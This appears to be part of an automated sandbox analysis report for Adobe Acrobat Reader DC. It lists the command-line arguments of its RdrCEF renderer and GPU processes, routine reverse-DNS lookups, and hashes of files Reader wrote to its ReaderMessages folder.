"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=85D31170BCF205141A5177E5DE883CE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=85D31170BCF205141A5177E5DE883CE7 --renderer-client-id=6 
--mojo-platform-channel-handle=2428 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D7581F74912E58562A63E4C799ECB66A --mojo-platform-channel-handle=2528 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.4.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 40101759c16d1569a80d090fe8dd2092 |
| SHA1 | ce177e9d12145f9154896ac51e6239318c6fe265 |
| SHA256 | f7f3f20f34bd0de6f154922f8aded50fc6eeb8e44205e729d41220cfd278fd2c |
| SHA512 | 0e0680ac7a5d2a1c8db3e9a8731083cd5637af0129911553ca960ee0205b69f70680594a4f74728490be848dfb98a851ca7cefde7fedc6747f8b024111c76cde |